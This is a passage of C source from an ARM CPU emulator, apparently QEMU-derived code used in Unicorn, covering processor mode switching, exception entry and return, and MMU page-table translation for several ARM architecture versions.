 * call is a fatal internal error.
 */
void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val)
{
    ARMCPU *cpu = arm_env_get_cpu(env);

    cpu_abort(CPU(cpu), "v7m_msr %d\n", reg);
}

/* User-mode stub: v7M special-register reads cannot occur here. */
uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg)
{
    ARMCPU *cpu = arm_env_get_cpu(env);

    cpu_abort(CPU(cpu), "v7m_mrs %d\n", reg);
    return 0;
}

/* User-mode emulation only ever runs in USR mode; any other target
 * mode indicates a bug in the translator.
 */
void switch_mode(CPUARMState *env, int mode)
{
    ARMCPU *cpu = arm_env_get_cpu(env);

    if (mode != ARM_CPU_MODE_USR) {
        cpu_abort(CPU(cpu), "Tried to switch out of user mode\n");
    }
}

/* User-mode stub: there are no banked registers without system emulation. */
void HELPER(set_r13_banked)(CPUARMState *env, uint32_t mode, uint32_t val)
{
    ARMCPU *cpu = arm_env_get_cpu(env);

    cpu_abort(CPU(cpu), "banked r13 write\n");
}

/* User-mode stub: there are no banked registers without system emulation. */
uint32_t HELPER(get_r13_banked)(CPUARMState *env, uint32_t mode)
{
    ARMCPU *cpu = arm_env_get_cpu(env);

    cpu_abort(CPU(cpu), "banked r13 read\n");
    return 0;
}

/* User-mode emulation: every exception is taken to EL1. */
unsigned int arm_excp_target_el(CPUState *cs, unsigned int excp_idx)
{
    return 1;
}

#else

/* Map CPU modes onto saved register banks.  */
int bank_number(int mode)
{
    /* USR and SYS share bank 0; the default case also falls through to
     * bank 0, so an out-of-range CPSR mode value is silently folded
     * there rather than treated as an error (see the disabled hw_error
     * below).
     */
    switch (mode) {
    default:
    case ARM_CPU_MODE_USR:
    case ARM_CPU_MODE_SYS:
        return 0;
    case ARM_CPU_MODE_SVC:
        return 1;
    case ARM_CPU_MODE_ABT:
        return 2;
    case ARM_CPU_MODE_UND:
        return 3;
    case ARM_CPU_MODE_IRQ:
        return 4;
    case ARM_CPU_MODE_FIQ:
        return 5;
    case ARM_CPU_MODE_HYP:
        return 6;
    case ARM_CPU_MODE_MON:
        return 7;
    }
    //hw_error("bank number requested for bad CPSR mode value 0x%x\n", mode);
}

/* Switch the CPU between ARM processor modes, saving the outgoing mode's
 * banked state and loading the incoming mode's.  r8-r12 (5 registers
 * starting at regs[8]) are only banked for FIQ, so they are swapped with
 * fiq_regs/usr_regs exactly when entering or leaving FIQ mode; r13, r14
 * and SPSR are banked per-mode via bank_number().
 */
void switch_mode(CPUARMState *env, int mode)
{
    int old_mode;
    int i;

    old_mode = env->uncached_cpsr & CPSR_M;
    if (mode == old_mode)
        return;

    if (old_mode == ARM_CPU_MODE_FIQ) {
        /* Leaving FIQ: stash FIQ's r8-r12 and restore the common set. */
        memcpy (env->fiq_regs, env->regs + 8, 5 * sizeof(uint32_t));
        memcpy (env->regs + 8, env->usr_regs, 5 * sizeof(uint32_t));
    } else if (mode == ARM_CPU_MODE_FIQ) {
        /* Entering FIQ: stash the common r8-r12 and load FIQ's copy. */
        memcpy (env->usr_regs, env->regs + 8, 5 * sizeof(uint32_t));
        memcpy (env->regs + 8, env->fiq_regs, 5 * sizeof(uint32_t));
    }

    i = bank_number(old_mode);

    env->banked_r13[i] = env->regs[13];
    env->banked_r14[i] = env->regs[14];
    env->banked_spsr[i] = env->spsr;

    i = bank_number(mode);
    env->regs[13] = env->banked_r13[i];
    env->regs[14] = env->banked_r14[i];
    env->spsr = env->banked_spsr[i];
}

/*
 * Determine the target EL for a given exception type.
 * AArch32 currently always routes to EL1; for AArch64, HVC/HYP traps go
 * to EL2, SMC to EL3, and physical IRQ/FIQ are routed upward by the
 * HCR_EL2.IMO/FMO and SCR_EL3.IRQ/FIQ routing bits.
 */
unsigned int arm_excp_target_el(CPUState *cs, unsigned int excp_idx)
{
    CPUARMState *env = cs->env_ptr;
    unsigned int cur_el = arm_current_el(env);
    unsigned int target_el;
    /* FIXME: Use actual secure state.  */
    bool secure = false;

    if (!env->aarch64) {
        /* TODO: Add EL2 and 3 exception handling for AArch32.  */
        return 1;
    }

    switch (excp_idx) {
    case EXCP_HVC:
    case EXCP_HYP_TRAP:
        target_el = 2;
        break;
    case EXCP_SMC:
        target_el = 3;
        break;
    case EXCP_FIQ:
    case EXCP_IRQ:
    {
        /* Pick the routing bits matching the interrupt type, then let
         * SCR_EL3 override HCR_EL2, which overrides the EL1 default.
         */
        const uint64_t hcr_mask = excp_idx == EXCP_FIQ ? HCR_FMO : HCR_IMO;
        const uint32_t scr_mask = excp_idx == EXCP_FIQ ? SCR_FIQ : SCR_IRQ;

        target_el = 1;
        if (!secure && (env->cp15.hcr_el2 & hcr_mask)) {
            target_el = 2;
        }
        if (env->cp15.scr_el3 & scr_mask) {
            target_el = 3;
        }
        break;
    }
    case EXCP_VIRQ:
    case EXCP_VFIQ:
        target_el = 1;
        break;
    default:
        /* Never take an exception to an EL below the current one. */
        target_el = MAX(cur_el, 1);
        break;
    }
    return target_el;
}

/* Push @val onto the current v7M stack (full-descending: decrement SP,
 * then store through the CPU's physical address space).
 */
static void v7m_push(CPUARMState *env, uint32_t val)
{
    CPUState *cs = CPU(arm_env_get_cpu(env));

    env->regs[13] -= 4;
    stl_phys(cs->as, env->regs[13], val);
}

/* Pop and return one word from the current v7M stack. */
static uint32_t v7m_pop(CPUARMState *env)
{
    CPUState *cs = CPU(arm_env_get_cpu(env));
    uint32_t val;

    val = ldl_phys(cs->as, env->regs[13]);
    env->regs[13] += 4;
    return val;
}

/* Switch to V7M main or process stack pointer.
 */
/* Exchange SP (r13) with the inactive stack pointer kept in
 * v7m.other_sp when the requested stack (@process nonzero = process
 * stack) differs from the one currently in use; no-op otherwise.
 */
static void switch_v7m_sp(CPUARMState *env, int process)
{
    uint32_t tmp;
    if (env->v7m.current_sp != process) {
        tmp = env->v7m.other_sp;
        env->v7m.other_sp = env->regs[13];
        env->regs[13] = tmp;
        env->v7m.current_sp = process;
    }
}

/* Perform a v7M exception return: the EXC_RETURN value has been placed
 * in r15 by the translator; bit 2 selects the process stack, and the
 * stacked frame {r0-r3, r12, lr, pc, xPSR} is popped in that order.
 * NVIC completion is disabled here (Unicorn has no NVIC model).
 */
static void do_v7m_exception_exit(CPUARMState *env)
{
    uint32_t type;
    uint32_t xpsr;

    type = env->regs[15];
    //if (env->v7m.exception != 0)
    //    armv7m_nvic_complete_irq(env->nvic, env->v7m.exception);

    /* Switch to the target stack.  */
    switch_v7m_sp(env, (type & 4) != 0);
    /* Pop registers.  */
    env->regs[0] = v7m_pop(env);
    env->regs[1] = v7m_pop(env);
    env->regs[2] = v7m_pop(env);
    env->regs[3] = v7m_pop(env);
    env->regs[12] = v7m_pop(env);
    env->regs[14] = v7m_pop(env);
    env->regs[15] = v7m_pop(env);
    xpsr = v7m_pop(env);
    /* Bit 9 of xPSR (stack-alignment indicator) is not restored. */
    xpsr_write(env, xpsr, 0xfffffdff);
    /* Undo stack alignment.  */
    if (xpsr & 0x200)
        env->regs[13] |= 4;
    /* ??? The exception return type specifies Thread/Handler mode.  However
       this is also implied by the xPSR value. Not sure what to do
       if there is a mismatch.  */
    /* ??? Likewise for mismatches between the CONTROL register and the stack
       pointer.  */
}

/* v7M exception entry: compute the EXC_RETURN value for lr, stack the
 * {r0-r3, r12, lr, pc, xPSR} frame on the current stack, switch to the
 * main stack, and vector through the table at v7m.vecbase.  The NVIC
 * interactions are stubbed out (commented) in this build.
 */
void arm_v7m_cpu_do_interrupt(CPUState *cs)
{
    CPUARMState *env = cs->env_ptr;
    uint32_t xpsr = xpsr_read(env);
    uint32_t lr;
    uint32_t addr;

    arm_log_exception(cs->exception_index);

    /* EXC_RETURN: base 0xfffffff1; bit 2 set if the process stack was
     * active, bit 3 set if we were in Thread mode (no active exception).
     */
    lr = 0xfffffff1;
    if (env->v7m.current_sp)
        lr |= 4;
    if (env->v7m.exception == 0)
        lr |= 8;

    /* For exceptions we just mark as pending on the NVIC, and let that
       handle it.  */
    /* TODO: Need to escalate if the current priority is higher than the
       one we're raising.  */
    switch (cs->exception_index) {
    case EXCP_UDEF:
        //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE);
        return;
    case EXCP_SWI:
        /* The PC already points to the next instruction.
         */
        //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SVC);
        return;
    case EXCP_PREFETCH_ABORT:
    case EXCP_DATA_ABORT:
        /* TODO: if we implemented the MPU registers, this is where we
         * should set the MMFAR, etc from exception.fsr and exception.vaddress.
         */
        //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_MEM);
        return;
    case EXCP_BKPT:
#if 0
        if (semihosting_enabled) {
            int nr;
            nr = arm_lduw_code(env, env->regs[15], env->bswap_code) & 0xff;
            if (nr == 0xab) {
                env->regs[15] += 2;
                env->regs[0] = do_arm_semihosting(env);
                qemu_log_mask(CPU_LOG_INT, "...handled as semihosting call\n");
                return;
            }
        }
#endif
        //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_DEBUG);
        return;
    case EXCP_IRQ:
        //env->v7m.exception = armv7m_nvic_acknowledge_irq(env->nvic);
        break;
    case EXCP_EXCEPTION_EXIT:
        do_v7m_exception_exit(env);
        return;
    default:
        cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index);
        return; /* Never happens.  Keep compiler happy.  */
    }

    /* Align stack pointer.  */
    /* ??? Should only do this if Configuration Control Register
       STACKALIGN bit is set.  */
    if (env->regs[13] & 4) {
        /* Record the realignment in xPSR bit 9 so exception return can
         * undo it.
         */
        env->regs[13] -= 4;
        xpsr |= 0x200;
    }
    /* Switch to the handler mode.  */
    v7m_push(env, xpsr);
    v7m_push(env, env->regs[15]);
    v7m_push(env, env->regs[14]);
    v7m_push(env, env->regs[12]);
    v7m_push(env, env->regs[3]);
    v7m_push(env, env->regs[2]);
    v7m_push(env, env->regs[1]);
    v7m_push(env, env->regs[0]);
    switch_v7m_sp(env, 0);
    /* Clear IT bits */
    env->condexec_bits = 0;
    env->regs[14] = lr;
    /* Fetch the handler address from the vector table; bit 0 of the
     * entry selects Thumb state.
     */
    addr = ldl_phys(cs->as, env->v7m.vecbase + env->v7m.exception * 4);
    env->regs[15] = addr & 0xfffffffe;
    env->thumb = addr & 1;
}

/* Handle a CPU exception.
*/ +void arm_cpu_do_interrupt(CPUState *cs) +{ + CPUARMState *env = cs->env_ptr; + ARMCPU *cpu = ARM_CPU(env->uc, cs); + uint32_t addr; + uint32_t mask; + int new_mode; + uint32_t offset; + uint32_t moe; + + assert(!IS_M(env)); + + arm_log_exception(cs->exception_index); + + if (arm_is_psci_call(cpu, cs->exception_index)) { + arm_handle_psci_call(cpu); + qemu_log_mask(CPU_LOG_INT, "...handled as PSCI call\n"); + return; + } + + /* If this is a debug exception we must update the DBGDSCR.MOE bits */ + switch (env->exception.syndrome >> ARM_EL_EC_SHIFT) { + case EC_BREAKPOINT: + case EC_BREAKPOINT_SAME_EL: + moe = 1; + break; + case EC_WATCHPOINT: + case EC_WATCHPOINT_SAME_EL: + moe = 10; + break; + case EC_AA32_BKPT: + moe = 3; + break; + case EC_VECTORCATCH: + moe = 5; + break; + default: + moe = 0; + break; + } + + if (moe) { + env->cp15.mdscr_el1 = deposit64(env->cp15.mdscr_el1, 2, 4, moe); + } + + /* TODO: Vectored interrupt controller. */ + switch (cs->exception_index) { + case EXCP_UDEF: + new_mode = ARM_CPU_MODE_UND; + addr = 0x04; + mask = CPSR_I; + if (env->thumb) + offset = 2; + else + offset = 4; + break; + case EXCP_SWI: +#if 0 + if (semihosting_enabled) { + /* Check for semihosting interrupt. */ + if (env->thumb) { + mask = arm_lduw_code(env, env->regs[15] - 2, env->bswap_code) + & 0xff; + } else { + mask = arm_ldl_code(env, env->regs[15] - 4, env->bswap_code) + & 0xffffff; + } + /* Only intercept calls from privileged modes, to provide some + semblance of security. */ + if (((mask == 0x123456 && !env->thumb) + || (mask == 0xab && env->thumb)) + && (env->uncached_cpsr & CPSR_M) != ARM_CPU_MODE_USR) { + env->regs[0] = do_arm_semihosting(env); + qemu_log_mask(CPU_LOG_INT, "...handled as semihosting call\n"); + return; + } + } +#endif + new_mode = ARM_CPU_MODE_SVC; + addr = 0x08; + mask = CPSR_I; + /* The PC already points to the next instruction. */ + offset = 0; + break; + case EXCP_BKPT: +#if 0 + /* See if this is a semihosting syscall. 
*/ + if (env->thumb && semihosting_enabled) { + mask = arm_lduw_code(env, env->regs[15], env->bswap_code) & 0xff; + if (mask == 0xab + && (env->uncached_cpsr & CPSR_M) != ARM_CPU_MODE_USR) { + env->regs[15] += 2; + env->regs[0] = do_arm_semihosting(env); + qemu_log_mask(CPU_LOG_INT, "...handled as semihosting call\n"); + return; + } + } +#endif + env->exception.fsr = 2; + /* Fall through to prefetch abort. */ + case EXCP_PREFETCH_ABORT: + env->cp15.ifsr_el2 = env->exception.fsr; + env->cp15.far_el[1] = deposit64(env->cp15.far_el[1], 32, 32, + env->exception.vaddress); + qemu_log_mask(CPU_LOG_INT, "...with IFSR 0x%x IFAR 0x%x\n", + env->cp15.ifsr_el2, (uint32_t)env->exception.vaddress); + new_mode = ARM_CPU_MODE_ABT; + addr = 0x0c; + mask = CPSR_A | CPSR_I; + offset = 4; + break; + case EXCP_DATA_ABORT: + env->cp15.esr_el[1] = env->exception.fsr; + env->cp15.far_el[1] = deposit64(env->cp15.far_el[1], 0, 32, + env->exception.vaddress); + qemu_log_mask(CPU_LOG_INT, "...with DFSR 0x%x DFAR 0x%x\n", + (uint32_t)env->cp15.esr_el[1], + (uint32_t)env->exception.vaddress); + new_mode = ARM_CPU_MODE_ABT; + addr = 0x10; + mask = CPSR_A | CPSR_I; + offset = 8; + break; + case EXCP_IRQ: + new_mode = ARM_CPU_MODE_IRQ; + addr = 0x18; + /* Disable IRQ and imprecise data aborts. */ + mask = CPSR_A | CPSR_I; + offset = 4; + break; + case EXCP_FIQ: + new_mode = ARM_CPU_MODE_FIQ; + addr = 0x1c; + /* Disable FIQ, IRQ and imprecise data aborts. */ + mask = CPSR_A | CPSR_I | CPSR_F; + offset = 4; + break; + case EXCP_SMC: + new_mode = ARM_CPU_MODE_MON; + addr = 0x08; + mask = CPSR_A | CPSR_I | CPSR_F; + offset = 0; + break; + default: + cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); + return; /* Never happens. Keep compiler happy. */ + } + /* High vectors. */ + if (env->cp15.c1_sys & SCTLR_V) { + /* when enabled, base address cannot be remapped. 
*/ + addr += 0xffff0000; + } else { + /* ARM v7 architectures provide a vector base address register to remap + * the interrupt vector table. + * This register is only followed in non-monitor mode, and has a secure + * and un-secure copy. Since the cpu is always in a un-secure operation + * and is never in monitor mode this feature is always active. + * Note: only bits 31:5 are valid. + */ + addr += env->cp15.vbar_el[1]; + } + + if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { + env->cp15.scr_el3 &= ~SCR_NS; + } + + switch_mode (env, new_mode); + /* For exceptions taken to AArch32 we must clear the SS bit in both + * PSTATE and in the old-state value we save to SPSR_, so zero it now. + */ + env->uncached_cpsr &= ~PSTATE_SS; + env->spsr = cpsr_read(env); + /* Clear IT bits. */ + env->condexec_bits = 0; + /* Switch to the new mode, and to the correct instruction set. */ + env->uncached_cpsr = (env->uncached_cpsr & ~CPSR_M) | new_mode; + env->daif |= mask; + /* this is a lie, as the was no c1_sys on V4T/V5, but who cares + * and we should just guard the thumb mode on V4 */ + if (arm_feature(env, ARM_FEATURE_V4T)) { + env->thumb = (env->cp15.c1_sys & SCTLR_TE) != 0; + } + env->regs[14] = env->regs[15] + offset; + env->regs[15] = addr; + cs->interrupt_request |= CPU_INTERRUPT_EXITTB; +} + +/* Check section/page access permissions. + Returns the page protection flags, or zero if the access is not + permitted. */ +static inline int check_ap(CPUARMState *env, int ap, int domain_prot, + int access_type, int is_user) +{ + int prot_ro; + + if (domain_prot == 3) { + return PAGE_READ | PAGE_WRITE; + } + + if (access_type == 1) + prot_ro = 0; + else + prot_ro = PAGE_READ; + + switch (ap) { + case 0: + if (arm_feature(env, ARM_FEATURE_V7)) { + return 0; + } + if (access_type == 1) + return 0; + switch (env->cp15.c1_sys & (SCTLR_S | SCTLR_R)) { + case SCTLR_S: + return is_user ? 
0 : PAGE_READ; + case SCTLR_R: + return PAGE_READ; + default: + return 0; + } + case 1: + return is_user ? 0 : PAGE_READ | PAGE_WRITE; + case 2: + if (is_user) + return prot_ro; + else + return PAGE_READ | PAGE_WRITE; + case 3: + return PAGE_READ | PAGE_WRITE; + case 4: /* Reserved. */ + return 0; + case 5: + return is_user ? 0 : prot_ro; + case 6: + return prot_ro; + case 7: + if (!arm_feature (env, ARM_FEATURE_V6K)) + return 0; + return prot_ro; + default: + abort(); + } +} + +static bool get_level1_table_address(CPUARMState *env, uint32_t *table, + uint32_t address) +{ + if (address & env->cp15.c2_mask) { + if ((env->cp15.c2_control & TTBCR_PD1)) { + /* Translation table walk disabled for TTBR1 */ + return false; + } + *table = env->cp15.ttbr1_el1 & 0xffffc000; + } else { + if ((env->cp15.c2_control & TTBCR_PD0)) { + /* Translation table walk disabled for TTBR0 */ + return false; + } + *table = env->cp15.ttbr0_el1 & env->cp15.c2_base_mask; + } + *table |= (address >> 18) & 0x3ffc; + return true; +} + +static int get_phys_addr_v5(CPUARMState *env, uint32_t address, int access_type, + int is_user, hwaddr *phys_ptr, + int *prot, target_ulong *page_size) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + int code; + uint32_t table; + uint32_t desc; + int type; + int ap; + int domain = 0; + int domain_prot; + hwaddr phys_addr; + + /* Pagetable walk. */ + /* Lookup l1 descriptor. */ + if (!get_level1_table_address(env, &table, address)) { + /* Section translation fault if page walk is disabled by PD0 or PD1 */ + code = 5; + goto do_fault; + } + desc = ldl_phys(cs->as, table); + type = (desc & 3); + domain = (desc >> 5) & 0x0f; + domain_prot = (env->cp15.c3 >> (domain * 2)) & 3; + if (type == 0) { + /* Section translation fault. */ + code = 5; + goto do_fault; + } + if (domain_prot == 0 || domain_prot == 2) { + if (type == 2) + code = 9; /* Section domain fault. */ + else + code = 11; /* Page domain fault. */ + goto do_fault; + } + if (type == 2) { + /* 1Mb section. 
*/ + phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); + ap = (desc >> 10) & 3; + code = 13; + *page_size = 1024 * 1024; + } else { + /* Lookup l2 entry. */ + if (type == 1) { + /* Coarse pagetable. */ + table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); + } else { + /* Fine pagetable. */ + table = (desc & 0xfffff000) | ((address >> 8) & 0xffc); + } + desc = ldl_phys(cs->as, table); + switch (desc & 3) { + case 0: /* Page translation fault. */ + code = 7; + goto do_fault; + case 1: /* 64k page. */ + phys_addr = (desc & 0xffff0000) | (address & 0xffff); + ap = (desc >> (4 + ((address >> 13) & 6))) & 3; + *page_size = 0x10000; + break; + case 2: /* 4k page. */ + phys_addr = (desc & 0xfffff000) | (address & 0xfff); + ap = (desc >> (4 + ((address >> 9) & 6))) & 3; + *page_size = 0x1000; + break; + case 3: /* 1k page. */ + if (type == 1) { + if (arm_feature(env, ARM_FEATURE_XSCALE)) { + phys_addr = (desc & 0xfffff000) | (address & 0xfff); + } else { + /* Page translation fault. */ + code = 7; + goto do_fault; + } + } else { + phys_addr = (desc & 0xfffffc00) | (address & 0x3ff); + } + ap = (desc >> 4) & 3; + *page_size = 0x400; + break; + default: + /* Never happens, but compiler isn't smart enough to tell. */ + abort(); + } + code = 15; + } + *prot = check_ap(env, ap, domain_prot, access_type, is_user); + if (!*prot) { + /* Access permission fault. */ + goto do_fault; + } + *prot |= PAGE_EXEC; + *phys_ptr = phys_addr; + return 0; +do_fault: + return code | (domain << 4); +} + +static int get_phys_addr_v6(CPUARMState *env, uint32_t address, int access_type, + int is_user, hwaddr *phys_ptr, + int *prot, target_ulong *page_size) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + int code; + uint32_t table; + uint32_t desc; + uint32_t xn; + uint32_t pxn = 0; + int type; + int ap; + int domain = 0; + int domain_prot; + hwaddr phys_addr; + + /* Pagetable walk. */ + /* Lookup l1 descriptor. 
*/ + if (!get_level1_table_address(env, &table, address)) { + /* Section translation fault if page walk is disabled by PD0 or PD1 */ + code = 5; + goto do_fault; + } + desc = ldl_phys(cs->as, table); + type = (desc & 3); + if (type == 0 || (type == 3 && !arm_feature(env, ARM_FEATURE_PXN))) { + /* Section translation fault, or attempt to use the encoding + * which is Reserved on implementations without PXN. + */ + code = 5; + goto do_fault; + } + if ((type == 1) || !(desc & (1 << 18))) { + /* Page or Section. */ + domain = (desc >> 5) & 0x0f; + } + domain_prot = (env->cp15.c3 >> (domain * 2)) & 3; + if (domain_prot == 0 || domain_prot == 2) { + if (type != 1) { + code = 9; /* Section domain fault. */ + } else { + code = 11; /* Page domain fault. */ + } + goto do_fault; + } + if (type != 1) { + if (desc & (1 << 18)) { + /* Supersection. */ + phys_addr = (desc & 0xff000000) | (address & 0x00ffffff); + *page_size = 0x1000000; + } else { + /* Section. */ + phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); + *page_size = 0x100000; + } + ap = ((desc >> 10) & 3) | ((desc >> 13) & 4); + xn = desc & (1 << 4); + pxn = desc & 1; + code = 13; + } else { + if (arm_feature(env, ARM_FEATURE_PXN)) { + pxn = (desc >> 2) & 1; + } + /* Lookup l2 entry. */ + table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); + desc = ldl_phys(cs->as, table); + ap = ((desc >> 4) & 3) | ((desc >> 7) & 4); + switch (desc & 3) { + case 0: /* Page translation fault. */ + code = 7; + goto do_fault; + case 1: /* 64k page. */ + phys_addr = (desc & 0xffff0000) | (address & 0xffff); + xn = desc & (1 << 15); + *page_size = 0x10000; + break; + case 2: case 3: /* 4k page. */ + phys_addr = (desc & 0xfffff000) | (address & 0xfff); + xn = desc & 1; + *page_size = 0x1000; + break; + default: + /* Never happens, but compiler isn't smart enough to tell. 
*/ + abort(); + } + code = 15; + } + if (domain_prot == 3) { + *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + } else { + if (pxn && !is_user) { + xn = 1; + } + if (xn && access_type == 2) + goto do_fault; + + /* The simplified model uses AP[0] as an access control bit. */ + if ((env->cp15.c1_sys & SCTLR_AFE) && (ap & 1) == 0) { + /* Access flag fault. */ + code = (code == 15) ? 6 : 3; + goto do_fault; + } + *prot = check_ap(env, ap, domain_prot, access_type, is_user); + if (!*prot) { + /* Access permission fault. */ + goto do_fault; + } + if (!xn) { + *prot |= PAGE_EXEC; + } + } + *phys_ptr = phys_addr; + return 0; +do_fault: + return code | (domain << 4); +} + +/* Fault type for long-descriptor MMU fault reporting; this corresponds + * to bits [5..2] in the STATUS field in long-format DFSR/IFSR. + */ +typedef enum { + translation_fault = 1, + access_fault = 2, + permission_fault = 3, +} MMUFaultType; + +static int get_phys_addr_lpae(CPUARMState *env, target_ulong address, + int access_type, int is_user, + hwaddr *phys_ptr, int *prot, + target_ulong *page_size_ptr) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + /* Read an LPAE long-descriptor translation table. */ + MMUFaultType fault_type = translation_fault; + uint32_t level = 1; + uint32_t epd; + int32_t tsz; + uint32_t tg; + uint64_t ttbr; + int ttbr_select; + hwaddr descaddr, descmask; + uint32_t tableattrs; + target_ulong page_size; + uint32_t attrs; + int32_t granule_sz = 9; + int32_t va_size = 32; + int32_t tbi = 0; + uint32_t t0sz; + uint32_t t1sz; + + if (arm_el_is_aa64(env, 1)) { + va_size = 64; + if (extract64(address, 55, 1)) + tbi = extract64(env->cp15.c2_control, 38, 1); + else + tbi = extract64(env->cp15.c2_control, 37, 1); + tbi *= 8; + } + + /* Determine whether this address is in the region controlled by + * TTBR0 or TTBR1 (or if it is in neither region and should fault). 
+ * This is a Non-secure PL0/1 stage 1 translation, so controlled by + * TTBCR/TTBR0/TTBR1 in accordance with ARM ARM DDI0406C table B-32: + */ + t0sz = extract32(env->cp15.c2_control, 0, 6); + if (arm_el_is_aa64(env, 1)) { + t0sz = MIN(t0sz, 39); + t0sz = MAX(t0sz, 16); + } + t1sz = extract32(env->cp15.c2_control, 16, 6); + if (arm_el_is_aa64(env, 1)) { + t1sz = MIN(t1sz, 39); + t1sz = MAX(t1sz, 16); + } + if (t0sz && !extract64(address, va_size - t0sz, t0sz - tbi)) { + /* there is a ttbr0 region and we are in it (high bits all zero) */ + ttbr_select = 0; + } else if (t1sz && !extract64(~address, va_size - t1sz, t1sz - tbi)) { + /* there is a ttbr1 region and we are in it (high bits all one) */ + ttbr_select = 1; + } else if (!t0sz) { + /* ttbr0 region is "everything not in the ttbr1 region" */ + ttbr_select = 0; + } else if (!t1sz) { + /* ttbr1 region is "everything not in the ttbr0 region" */ + ttbr_select = 1; + } else { + /* in the gap between the two regions, this is a Translation fault */ + fault_type = translation_fault; + goto do_fault; + } + + /* Note that QEMU ignores shareability and cacheability attributes, + * so we don't need to do anything with the SH, ORGN, IRGN fields + * in the TTBCR. Similarly, TTBCR:A1 selects whether we get the + * ASID from TTBR0 or TTBR1, but QEMU's TLB doesn't currently + * implement any ASID-like capability so we can ignore it (instead + * we will always flush the TLB any time the ASID is changed). 
+ */ + if (ttbr_select == 0) { + ttbr = env->cp15.ttbr0_el1; + epd = extract32(env->cp15.c2_control, 7, 1); + tsz = t0sz; + + tg = extract32(env->cp15.c2_control, 14, 2); + if (tg == 1) { /* 64KB pages */ + granule_sz = 13; + } + if (tg == 2) { /* 16KB pages */ + granule_sz = 11; + } + } else { + ttbr = env->cp15.ttbr1_el1; + epd = extract32(env->cp15.c2_control, 23, 1); + tsz = t1sz; + + tg = extract32(env->cp15.c2_control, 30, 2); + if (tg == 3) { /* 64KB pages */ + granule_sz = 13; + } + if (tg == 1) { /* 16KB pages */ + granule_sz = 11; + } + } + + if (epd) { + /* Translation table walk disabled => Translation fault on TLB miss */ + goto do_fault; + } + + /* The starting level depends on the virtual address size (which can be + * up to 48 bits) and the translation granule size. It indicates the number + * of strides (granule_sz bits at a time) needed to consume the bits + * of the input address. In the pseudocode this is: + * level = 4 - RoundUp((inputsize - grainsize) / stride) + * where their 'inputsize' is our 'va_size - tsz', 'grainsize' is + * our 'granule_sz + 3' and 'stride' is our 'granule_sz'. + * Applying the usual "rounded up m/n is (m+n-1)/n" and simplifying: + * = 4 - (va_size - tsz - granule_sz - 3 + granule_sz - 1) / granule_sz + * = 4 - (va_size - tsz - 4) / granule_sz; + */ + level = 4 - (va_size - tsz - 4) / granule_sz; + + /* Clear the vaddr bits which aren't part of the within-region address, + * so that we don't have to special case things when calculating the + * first descriptor address. 
+ */ + if (tsz) { + address &= (1ULL << (va_size - tsz)) - 1; + } + + descmask = (1ULL << (granule_sz + 3)) - 1; + + /* Now we can extract the actual base address from the TTBR */ + descaddr = extract64(ttbr, 0, 48); + descaddr &= ~((1ULL << (va_size - tsz - (granule_sz * (4 - level)))) - 1); + + tableattrs = 0; + for (;;) { + uint64_t descriptor; + + descaddr |= (address >> (granule_sz * (4 - level))) & descmask; + descaddr &= ~7ULL; + descriptor = ldq_phys(cs->as, descaddr); + if (!(descriptor & 1) || + (!(descriptor & 2) && (level == 3))) { + /* Invalid, or the Reserved level 3 encoding */ + goto do_fault; + } + descaddr = descriptor & 0xfffffff000ULL; + + if ((descriptor & 2) && (level < 3)) { + /* Table entry. The top five bits are attributes which may + * propagate down through lower levels of the table (and + * which are all arranged so that 0 means "no effect", so + * we can gather them up by ORing in the bits at each level). + */ + tableattrs |= extract64(descriptor, 59, 5); + level++; + continue; + } + /* Block entry at level 1 or 2, or page entry at level 3. + * These are basically the same thing, although the number + * of bits we pull in from the vaddr varies. + */ + page_size = (1ULL << ((granule_sz * (4 - level)) + 3)); + descaddr |= (address & (page_size - 1)); + /* Extract attributes from the descriptor and merge with table attrs */ + attrs = extract64(descriptor, 2, 10) + | (extract64(descriptor, 52, 12) << 10); + attrs |= extract32(tableattrs, 0, 2) << 11; /* XN, PXN */ + attrs |= extract32(tableattrs, 3, 1) << 5; /* APTable[1] => AP[2] */ + /* The sense of AP[1] vs APTable[0] is reversed, as APTable[0] == 1 + * means "force PL1 access only", which means forcing AP[1] to 0. + */ + if (extract32(tableattrs, 2, 1)) { + attrs &= ~(1 << 4); + } + /* Since we're always in the Non-secure state, NSTable is ignored. */ + break; + } + /* Here descaddr is the final physical address, and attributes + * are all in attrs. 
+ */ + fault_type = access_fault; + if ((attrs & (1 << 8)) == 0) { + /* Access flag */ + goto do_fault; + } + fault_type = permission_fault; + if (is_user && !(attrs & (1 << 4))) { + /* Unprivileged access not enabled */ + goto do_fault; + } + *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + if ((arm_feature(env, ARM_FEATURE_V8) && is_user && (attrs & (1 << 12))) || + (!arm_feature(env, ARM_FEATURE_V8) && (attrs & (1 << 12))) || + (!is_user && (attrs & (1 << 11)))) { + /* XN/UXN or PXN. Since we only implement EL0/EL1 we unconditionally + * treat XN/UXN as UXN for v8. + */ + if (access_type == 2) { + goto do_fault; + } + *prot &= ~PAGE_EXEC; + } + if (attrs & (1 << 5)) { + /* Write access forbidden */ + if (access_type == 1) { + goto do_fault; + } + *prot &= ~PAGE_WRITE; + } + + *phys_ptr = descaddr; + *page_size_ptr = page_size; + return 0; + +do_fault: + /* Long-descriptor format IFSR/DFSR value */ + return (1 << 9) | (fault_type << 2) | level; +} + +static int get_phys_addr_mpu(CPUARMState *env, uint32_t address, + int access_type, int is_user, + hwaddr *phys_ptr, int *prot) +{ + int n; + uint32_t mask; + uint32_t base; + + *phys_ptr = address; + for (n = 7; n >= 0; n--) { + base = env->cp15.c6_region[n]; + if ((base & 1) == 0) + continue; + mask = 